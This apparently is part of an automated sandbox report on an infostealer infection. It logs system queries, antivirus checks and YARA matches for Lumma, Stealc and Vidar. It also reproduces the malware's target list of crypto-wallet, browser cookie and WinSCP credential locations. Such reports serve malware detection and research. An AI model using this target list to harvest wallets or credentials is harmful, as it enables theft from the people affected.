                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeQueries volume information: unknown VolumeInformation
                            Source: C:\ProgramData\FIEHIIIJDA.exeQueries volume information: C:\ProgramData\FIEHIIIJDA.exe VolumeInformation
                            Source: C:\ProgramData\JJJEGCGDGH.exeQueries volume information: C:\ProgramData\JJJEGCGDGH.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\ProgramData\EBAEBFIIEC.exeQueries volume information: C:\ProgramData\EBAEBFIIEC.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0054009B GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,6_2_0054009B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_004411F0 GetComputerNameA,__aulldiv,GlobalAlloc,LookupAccountNameA,GetLastError,ConvertSidToStringSidA,GetLastError,6_2_004411F0
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,19_2_00417A30
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_0042CEA0 RtlGetVersion,GetVersionExA,6_2_0042CEA0
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: RegAsm.exe, 00000014.00000002.3190699075.000000000161A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.3190699075.0000000001699000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.3012453273.00000000012C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.000000000156F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002F.00000002.3450965793.000000000150B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected LummaC Stealer
                            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                            Yara detected PrivateLoader
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 364, type: MEMORYSTR
                            Yara detected Stealc
                            Source: Yara matchFile source: 13.2.ZNiWLZA4sT3dAjz_lF65fVs6.exe.4115570.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.ZNiWLZA4sT3dAjz_lF65fVs6.exe.4115570.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000013.00000002.2779012779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000013.00000002.2783474686.000000000147A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.2333416997.0000000004115000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Yara detected Vidar
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Yara detected Vidar stealer
                            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                            Source: Yara matchFile source: 35.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.E4aR4O9hOTF5WJfvKNpcVCp8.exe.38e5570.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.E4aR4O9hOTF5WJfvKNpcVCp8.exe.38e5570.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 35.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000023.00000002.2984201099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000023.00000002.3012453273.000000000132F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.2354142791.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: E4aR4O9hOTF5WJfvKNpcVCp8.exe PID: 6812, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2632, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5316, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6208, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 340, type: MEMORYSTR
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: RegAsm.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
                            Source: RegAsm.exeString found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
                            Source: RegAsm.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
                            Source: RegAsm.exeString found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
                            Source: RegAsm.exeString found in binary or memory: \jaxx\Local Storage\
                            Source: RegAsm.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
                            Source: RegAsm.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
                            Source: RegAsm.exeString found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
                            Source: RegAsm.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
                            Source: RegAsm.exeString found in binary or memory: passphrase.json
                            Source: RegAsm.exeString found in binary or memory: \jaxx\Local Storage\
                            Source: RegAsm.exeString found in binary or memory: \Ethereum\
                            Source: RegAsm.exe, 00000006.00000002.2325722695.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: user-PC\useraming\ExodusQ
                            Source: RegAsm.exeString found in binary or memory: Ethereum
                            Source: RegAsm.exeString found in binary or memory: file__0.localstorage
                            Source: RegAsm.exeString found in binary or memory: \Coinomi\Coinomi\wallets\
                            Source: RegAsm.exeString found in binary or memory: \Exodus\exodus.wallet\
                            Source: RegAsm.exeString found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
                            Source: RegAsm.exeString found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
                            Source: RegAsm.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
                            Source: RegAsm.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
                            Tries to harvest and steal Bitcoin Wallet information
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
